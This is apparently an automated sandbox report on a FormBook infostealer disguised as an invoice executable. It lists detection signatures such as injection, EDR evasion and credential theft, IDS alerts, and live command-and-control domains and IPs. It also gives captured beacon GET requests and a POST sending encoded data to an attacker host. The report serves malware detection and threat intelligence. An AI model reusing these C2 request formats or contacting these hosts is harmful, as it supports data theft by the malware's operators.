Windows Analysis Report
FACTURA 24V70 VINS.exe

Overview

General Information

Sample name:	FACTURA 24V70 VINS.exe
Analysis ID:	1562313
MD5:	6e3917643d8c875e3f45c265b82cca9d
SHA1:	09163656f409eade7b892bd1e7ec8f9cdf045715
SHA256:	ddca7740e832942313e7bd03a5670bc03cb09d8113433826e252666eeda046ab
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.accupower.tech/bruv/	Avira URL Cloud: Label: malware
Source: http://www.accupower.tech/bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: FACTURA 24V70 VINS.exe

ReversingLabs: Detection: 63%

Yara detected FormBook

Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: FACTURA 24V70 VINS.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: FACTURA 24V70 VINS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FACTURA 24V70 VINS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cacls.pdbGCTL source: FACTURA 24V70 VINS.exe, 00000003.00000002.3037746127.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4648456843.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cacls.pdb source: FACTURA 24V70 VINS.exe, 00000003.00000002.3037746127.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4648456843.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fXZvHKoWCzop.exe, 0000000B.00000000.2950556668.0000000000E5E000.00000002.00000001.01000000.0000000C.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4649752534.0000000000E5E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: FACTURA 24V70 VINS.exe, 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000003.3054296434.000000000351F000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000003.3051687019.0000000003364000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FACTURA 24V70 VINS.exe, FACTURA 24V70 VINS.exe, 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 0000000C.00000003.3054296434.000000000351F000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000003.3051687019.0000000003364000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\cacls.exe

Code function: 12_2_02DAC4D0 FindFirstFileW,FindNextFileW,FindClose,

12_2_02DAC4D0

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then xor eax, eax		12_2_02D99BD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then mov ebx, 00000004h		12_2_03A204DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49947 -> 168.206.11.225:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50025 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 217.160.0.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 217.160.0.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50043 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50050 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50037 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50042 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50045 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50029 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50047 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50038 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50041 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50049 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50048 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50033 -> 217.160.0.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 217.160.0.158:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 213.249.67.10 213.249.67.10
Source: Joe Sandbox View	IP Address: 217.160.0.158 217.160.0.158

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: METAREGISTRARNL METAREGISTRARNL
Source: Joe Sandbox View	ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fi6o/?0dfXG=hGALt7t5gSxqIzGlUS2XPVJcZRq8G4bpVz89Igngf/M66ae3aRT9B4yDBGrb5mJVJyE8wpLrmF7Ln1eyeL70u5A2xvjbG9IBG0pL8zTYHC2rbtbDMuSlaq2pAvIKqKWvpuiBTOk=&U0W=7ROlj HTTP/1.1Host: www.iwhfa.fyiAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /vt2q/?0dfXG=NeoW3ZpGNhFVpRE+iGe18olEV8dN0FIDCvpVAutU77D6mk6iXiXc50i5bVx+uujx/SS4gHQAhcY6fImMEntZJ64couIpYsJtCpfvEgcpegPN4ht4aXCPY1AcPZvlMYHCMmAE9mg=&U0W=7ROlj HTTP/1.1Host: www.nieuws-july202502.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lbm4/?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj HTTP/1.1Host: www.wiretap.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bpal/?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj HTTP/1.1Host: www.impulsarnegocios.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj HTTP/1.1Host: www.accupower.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x6qo/?0dfXG=LYoYqqsXSyXZ912d02KeRxWxUajovPP+KCE++TS9h3rijU4gS1lBkAl2SxoHngebSXZzdlj5br48AWpKGxuZwHFzrTAaxdvQ/X7He5kEj4NwOXn+jWKWbQEmUjM4tYdd4DTDmwg=&U0W=7ROlj HTTP/1.1Host: www.tanjavanlaar.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wlzg/?0dfXG=c08zQlMNeTS9mFjcPTIyFfA1amU1nGqngy7ufrhJTucKXTiOjnqlR7bZNhOZWme4Y5s9JAieBcHnX0Bnfm5WdfKnufcgj0lRy4Tut92jAo5YyVSLqem1aQwSKpkntqqW/GXfj2I=&U0W=7ROlj HTTP/1.1Host: www.kuaimaolife.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ktuy/?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA= HTTP/1.1Host: www.funddata-x.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /zrnp/?0dfXG=7dvP3oKbkgtActo7X+aB5i8XRavAV5IyhK19vEIy5gkELgbrMMXbl9nvhn4QjRtqjZGCw7A4nUi7FbRpiGaR0ExHc3mJnAhEafCzKEQKll8qfESIyEeBcE8V5iUbRPjYsxxHG3c=&U0W=7ROlj HTTP/1.1Host: www.hellogus.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.iwhfa.fyi
Source: global traffic	DNS traffic detected: DNS query: www.nieuws-july202502.sbs
Source: global traffic	DNS traffic detected: DNS query: www.wiretap.digital
Source: global traffic	DNS traffic detected: DNS query: www.o30cf998d.cfd
Source: global traffic	DNS traffic detected: DNS query: www.impulsarnegocios.info
Source: global traffic	DNS traffic detected: DNS query: www.accupower.tech
Source: global traffic	DNS traffic detected: DNS query: www.tanjavanlaar.online
Source: global traffic	DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: global traffic	DNS traffic detected: DNS query: www.funddata-x.net
Source: global traffic	DNS traffic detected: DNS query: www.hellogus.online

Source: unknown

HTTP traffic detected: POST /vt2q/ HTTP/1.1Host: www.nieuws-july202502.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.nieuws-july202502.sbsReferer: http://www.nieuws-july202502.sbs/vt2q/User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36Data Raw: 30 64 66 58 47 3d 41 63 41 32 30 73 45 39 45 7a 77 37 34 52 77 2f 6f 58 75 52 70 36 4a 79 55 65 56 68 39 58 77 52 45 4f 51 6f 65 70 39 74 79 70 48 6e 6e 48 79 45 54 77 50 46 6e 46 71 48 44 55 42 4d 37 62 71 75 69 41 57 48 74 48 55 35 6e 38 51 38 50 34 69 50 64 56 6f 78 52 65 41 33 37 65 70 76 62 72 64 34 4e 59 33 79 4a 42 41 30 61 43 7a 48 79 32 6f 54 61 48 69 67 53 55 4a 4f 4c 76 44 71 4f 4b 75 46 44 56 68 63 34 42 73 49 51 43 33 44 58 6c 7a 47 47 44 72 2f 6d 30 30 4e 4c 71 64 78 43 39 47 7a 41 68 56 58 48 58 41 58 70 44 55 4e 43 70 46 33 64 54 6f 67 61 34 38 42 6a 54 74 5a 61 59 52 64 68 65 39 7a 76 46 6c 4e 4c 7a 70 4e Data Ascii: 0dfXG=AcA20sE9Ezw74Rw/oXuRp6JyUeVh9XwREOQoep9typHnnHyETwPFnFqHDUBM7bquiAWHtHU5n8Q8P4iPdVoxReA37epvbrd4NY3yJBA0aCzHy2oTaHigSUJOLvDqOKuFDVhc4BsIQC3DXlzGGDr/m00NLqdxC9GzAhVXHXAXpDUNCpF3dToga48BjTtZaYRdhe9zvFlNLzpN

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 25 Nov 2024 12:56:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 25 Nov 2024 12:56:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 